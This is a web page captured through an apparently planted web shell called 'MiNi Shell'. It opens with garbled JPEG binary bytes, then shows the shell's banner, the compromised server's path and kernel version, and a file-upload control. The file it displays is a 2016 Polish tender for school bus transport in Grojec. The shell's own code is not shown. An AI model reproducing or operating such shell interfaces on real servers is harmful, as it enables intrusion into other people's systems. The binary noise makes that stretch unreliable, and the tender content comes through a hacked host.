JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160512/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160512/119410-N-2016.html

<p class="kh_header"><b>Grojec: Przewóz uczniów i dzieci przedszkolnych ze Stawów Grojeckich i Łazów do Szkoły Podstawowej Grojec i uczniów  z Zaborza do Szkoły Podstawowej  Nr 11 w Oświęcimiu w roku szkolnym 2016/2017</b><br>
<b>Numer ogłoszenia: 119410 - 2016; data zamieszczenia: 12.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa im. H. Sienkiewicza w Grojcu , Al. Ogrodowa 2, 32-615 Grojec, woj. małopolskie, tel. 0-33 8428580, 828373, faks 0-33 8428373.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przewóz uczniów i dzieci przedszkolnych ze Stawów Grojeckich i Łazów do Szkoły Podstawowej Grojec i uczniów  z Zaborza do Szkoły Podstawowej  Nr 11 w Oświęcimiu w roku szkolnym 2016/2017.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest usługa przewozu (tj. dowóz i odwóz) uczniów i dzieci przedszkolnych (pięcioletnich, sześcioletnich) wraz z opiekunami ze Stawów Grojeckich  i Łazów do Szkoły Podstawowej w Grojcu ul. Al. Ogrodowa 2  i uczniów z Zaborza do Szkoły Podstawowej Nr 11 w Oświęcimiu. Usługa dowozu i odwozu do w/w szkół będzie świadczona w dni przeprowadzania w nich zajęć, zgodnie z kalendarzem roku szkolnego 2016/2017.    
Trasy dowozu:
1)	Dowóz do SP Grojec (trasa dojazdu od strony Oświęcimia):
a)	przystanki:
Adolfin godz. 7:15
Zerwisko
Stare Stawy - sklep
przy ul. Radziwiłł
przy ul. Leśna Grobel
Grojec - Krzyżówka
na ul. Czajki przy posesji nr 16a
na ulicy Czajki przy posesji nr 43
na ulicy Czajki przy posesji nr 63b
Tarniówka
Grojec - Szkoła (wysiadają dzieci ze Stawów Grojeckich autobus jedzie po dzieci z terenu Łazy)
Łazy - pętla koło klepu
Grojec - Stawy (Puściny)
Grojec - Domżał
Grojec- Dom Ludowy
Grojec szkoła
b)	odległość od pierwszego przystanku Stawy Grojeckie do szkoły wynosi ok. 11 km; odległość od szkoły do  Łazów - ok. 3 km.
c)	liczba  dzieci:  
Liczba dojeżdżających dzieci ze Stawów Grojeckich, ulicy Czajki, Tarniówki uprawnionych do dowozu jest 79 (55 uczniów z SP Grojec i 24 dzieci przedszkolnych)  natomiast z Łazów -47 dzieci (37 uczniów z SP Grojec i 10 dzieci  przedszkolnych)
d)	ilość kursów dziennie: 2 tj. dowóz i odwóz
e)	odjazd dzieci spod SP w Grojcu od poniedziałku do piątku ok. godz. 14:45   (podstawienie autobusu 10 minut przed odjazdem) wg trasy
Grojec - szkoła (odwóz dzieci z Łazów)
Grojec -Dom Ludowy
Grojec - Domżał
Grojec - Stawy (Puściny)
Łazy - pętla koło sklepu
Grojec szkoła (odwóz dzieci ze Stawów Grojeckich)
na ulicy Czajki przy posesji nr 63b
na ulicy Czajki przy posesji nr 43
na ulicy Czajki przy posesji nr 16a
Tarniówka
Grojec -Krzyżówka
przy ul. Leśna Grobel
przy ul. Radziwiłł
Stare Stawy - sklep
Zerwisko
Adolfin

2)	Dowóz do SP Nr 11 w Oświęcimiu
a)	trasa dowozu: ul. Słowackiego 2a (zatoczka  SP 11)- Olszewskiego - Fabryczna - pod Borem - pod Dębem -Porębska - Zatorska - pętla osiedlowa (domki jednorodzinne) - Grojecka - Gościnna - pętla Zaborze - Gościnna - Grojecka - pod Górką - Słowackiego SP Nr 11
długość trasy: ok. 9,5 km
b)	trasa odwozu: ul. Słowackiego 2a (zatoczka SP 11)- Olszewskiego - Fabryczna - pod Borem - pod Dębem - Porębska - Zatorska - pętla osiedlowa (domki jednorodzinne) - Grojecka - Gościnna - pętla Zaborze
długość  trasy: ok.7,5 km
c)	ilość kursów dziennie: 3 tj. 
- 1 kurs dowóz uczniów do SP Nr 11 w Oświęcimiu godz.7:20- ok. 40 uczniów
- 1 kurs odwozu uczniów  godz. 12:40 ok. 20 uczniów
- 1 kurs odwozu  uczniów godz. 14:30 ok.50 uczniów
d)	przystanki:
przy posesji pod Borem 9
przy posesji Pod Dębem 19 i Pod Dębem 1
ul. Porębska - przystanek MZK i przy posesji Porębska 5
pętla osiedlowa (domki jednorodzinne) -przystanek MZK
ul. Grojecka  - 2 - przystanki MZK
ul. Gościnna -  2 - przystanki MZK

2.Usługa przewozu będzie świadczona środkiem transportu- autobusami dopuszczonymi do ruchu drogowego posiadającymi aktualne świadectwa przeglądu technicznego oraz ubezpieczenie OC umożliwiającymi bezpieczny i zgodny z obowiązującymi przepisami przewóz  dzieci na poszczególnych trasach. Autobusy posiadać muszą zgodnie z obowiązującymi przepisami oznakowanie dla przewozu dzieci i młodzieży.
3.Opiekę nad dziećmi podczas dowozu ze Stawów Grojeckich  i Łazów do SP Grojec oraz w czasie ich odwozu  zapewnia Szkoła Podstawowa w Grojcu, natomiast w przypadku dowozu uczniów z Zaborza do SP Nr 11 w Oświęcimiu i ich odwozu -Szkoła Podstawowa Nr 11 w Oświęcimiu.
4.Zamawiający zastrzega sobie możliwość odwoływania kursów oraz  zmiany  godzin dowozu i odwozu po wcześniejszym uzgodnieniu z Wykonawcą z  trzydniowym wyprzedzeniem.
5.Przewozy odbywać się będą w dni powszednie od poniedziałku do piątku, z wyłączeniem  dni wolnych od zajęć
6.W indywidualnych przypadkach w ciągu roku szkolnego Wykonawca może świadczyć usługę przewozu  w inny dzień (tj. odpracowanie w  sobotę dnia wolnego). 
7.Zamawiający informuje, że ilość dni przewozu dzieci w okresie realizacji zamówienia wynosi ok.199 dni.
8. Zamawiający zastrzega, iż podana ilość dni przewozu, o których mowa wyżej  jest wielkością orientacyjną i może ulec zmniejszeniu. Z tego tytułu Wykonawcy nie będą przysługiwać  żadne roszczenia, w tym roszczenia finansowe. Wykonawca otrzyma wynagrodzenie wyłącznie za przewozy zrealizowane.
9.Podana liczba przewożonych dzieci jest liczbą planowaną. Zamawiający zastrzega, że rzeczywista liczba przewożonych dzieci podczas każdego kursu może różnić się od planowanej, przy czym zwiększenie liczby przewożonych dzieci podczas kursu nie może przekroczyć 20% liczby planowanej. Wykonawcy z tego tytułu to jest w/w zmiany liczby przewożonych dzieci nie będą przysługiwały w stosunku do Zamawiającego żadne roszczenia ( w tym roszczenia finansowe).
10.Zamawiający zastrzega sobie możliwość zmiany przebiegu trasy przewozu dzieci, przy czym zmiana ta nie może powodować większego niż o 10% jej wydłużenia w stosunku do trasy pierwotnej. Wykonawcy z tego tytułu to jest w/w zmiany przebiegu trasy przewozu dzieci nie będą przysługiwały w stosunku do Zamawiającego żadne roszczenia ( w tym roszczenia finansowe)
11.Ponadto w ramach realizacji  niniejszego zamówienia Wykonawca zobowiązany będzie m.in. 
1)	zapewnić ubezpieczenie pojazdu, którym będą przewożone dzieci;
2)	zapewnić ubezpieczenie przewożonych  dzieci;
3)	zapewnić przewożonym dzieciom przewidziane prawem warunki bezpieczeństwa, i odpowiedniego standardu przewozu, przez który należy rozumieć: brak oparów paliwa we wnętrzu pojazdu, czyste wnętrze,  ilość osób przewożonych zgodną z określonymi normami technicznymi dla danego rodzaju pojazdu, pełną sprawność techniczną środka transportu,
4)	ponosić wszystkie koszty związane z eksploatacją pojazdu i uiszczania opłat oraz kar nałożonych na niego przez właściwe organy,
5)	posiadać wszystkie ważne wymagane przepisami dokumenty przewozowe, które na żądanie Zamawiającego powinien okazać,
6)	  w razie wystąpienia  przejściowych okoliczności uniemożliwiających mu świadczenie usług (np. awaria, zatrzymanie pojazdu ) objętych niniejszą umową we własnym zakresie, na własny koszt zapewni pojazdy zastępcze o standardzie nie gorszym niż jego pojazdy oraz osoby, które w jego imieniu i za pisemną zgodą Zamawiającego będą świadczyć usługi. Zapewnienie zastępczego pojazdu nastąpi w czasie maksymalnie do 60 minut od zdarzenia. Wykonawca w składanej ofercie może zaproponować krótszy czas podstawienia pojazdu zastępczego, w przypadku wystąpienia awarii, zatrzymania w trakcie przewozu dzieci.
Uwaga: czas podstawienia pojazdu zastępczego  stanowi drugie kryterium oceny ofert (czas reakcji) patrz część XVI SIWZ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie  dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca w tym zakresie musi posiadać aktualną licencję   na wykonywanie krajowego transportu  drogowego osób zgodnie z ustawą z dnia 6 września 2001r. o transporcie drogowym (tekst jednolity: Dz. U. 2013.1414  z późn. zm.), 
Ocena spełniania warunków będzie dokonana  na zasadzie  spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie należycie wykonał lub nadal należycie wykonuje co najmniej jedną usługę przewozu osób o charakterze ciągłym spełniające dodatkowo poniższe wymogi:
dot. usług zakończonych : okres realizacji - co najmniej 6 miesięcy. 
dot. usług niezakończonych: zrealizowany okres świadczenia  - co najmniej 6 miesięcy- załącznik nr 4 do SIWZ.
Ocena spełniania warunków będzie dokonana  na zasadzie  spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku.
Zamawiający uzna warunek za spełniony na podstawie oświadczenia Wykonawcy złożonego wg wzoru stanowiącego załącznik nr 2 do SIWZ. 
Ocena spełniania warunków będzie dokonana  na zasadzie  spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku.
Zamawiający uzna warunek za spełniony na podstawie oświadczenia Wykonawcy złożonego wg wzoru stanowiącego załącznik nr 2 do SIWZ. 
Ocena spełniania warunków będzie dokonana  na zasadzie  spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku.
Zamawiający uzna warunek za spełniony na podstawie oświadczenia Wykonawcy złożonego wg wzoru stanowiącego załącznik nr 2 do SIWZ. 
Ocena spełniania warunków będzie dokonana  na zasadzie  spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	upoważnienie (pełnomocnictwo) - do podpisania oferty o ile nie wynika z innych dokumentów załączonych przez wykonawcę;
2)	wypełniony i podpisany przez Wykonawcę formularz ofertowy sporządzony według wzoru stanowiącego załącznik nr 1 do SIWZ.
3)	informację dot. powstania u Zamawiającego obowiązku podatkowego w podatku VAT w trybie art. 91 ust. 3a ustawy Pzp 
4)pisemne zobowiązanie  podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.- dotyczy tylko sytuacji  gdy Wykonawca będzie polegał  na zasobach innych podmiotów  w celu wykazania spełnienia warunków udziału w postępowaniu.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - czas reakcji - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się zmianę umowy w następujących przypadkach: 
1)	 zmianie może ulec zakres przedmiotu umowy w przypadku gdy nastąpi zmiana trasy przejazdów, zmiana ilości kilometrów, liczby kursów i liczby dzieci, godzin dowozu i odwozu;. Zamawiający zastrzega, że rzeczywista liczba przewożonych dzieci podczas każdego kursu może różnić się od planowanej, przy czym zwiększenie liczby przewożonych dzieci podczas kursu nie może przekroczyć 20% liczby planowanej. Wykonawcy z tego tytułu to jest w/w zmiany liczby przewożonych dzieci nie będą przysługiwały w stosunku do Zamawiającego żadne roszczenia ( w tym roszczenia finansowe).
Zamawiający zastrzega sobie możliwość zmiany przebiegu trasy przewozu dzieci, przy czym zmiana ta nie może powodować większego niż o 10% jej wydłużenia w stosunku do trasy pierwotnej. Wykonawcy z tego tytułu to jest w/w zmiany przebiegu trasy przewozu dzieci nie będą przysługiwały w stosunku do Zamawiającego żadne roszczenia ( w tym roszczenia finansowe)
2)	zmiana przepisów prawa dotyczących przedmiotu zamówienia,
3)	 zmianę wynagrodzenia  w przypadku ustawowej zmiany  podatku od towarów i usług VAT w okresie obowiązywania umowy, 
4)	z powodu okoliczności  siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez  czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu osób lub grożącego powstaniem szkody w znacznych rozmiarach,
5)	z powodu działań osób trzecich uniemożliwiających wykonanie usługi, które to działania nie są konsekwencją winy którejkolwiek ze stron.
6)	zmniejszenia ilości dni, w których będzie świadczona usługa przewozu w stosunku do orientacyjnej ilości podanej w SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.malopolska.pl/spwgrojcu1<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szkoła Podstawowa im. Henryka Sienkiewicza w Grojcu 
32-615 Grojec, Al. Ogrodowa 2,
Zespół Ekonomiczno-Administracyjny Szkół i Przedszkoli Gminnych w Oświęcimiu z/s w Rajsku ul. Edukacyjna 9,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.05.2016 godzina 09:00, miejsce: Zespół Ekonomiczno-Administracyjny Szkół i Przedszkoli Gminnych w Oświęcimiu z/s w Rajsku ul. Edukacyjna 9, pok nr 8 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com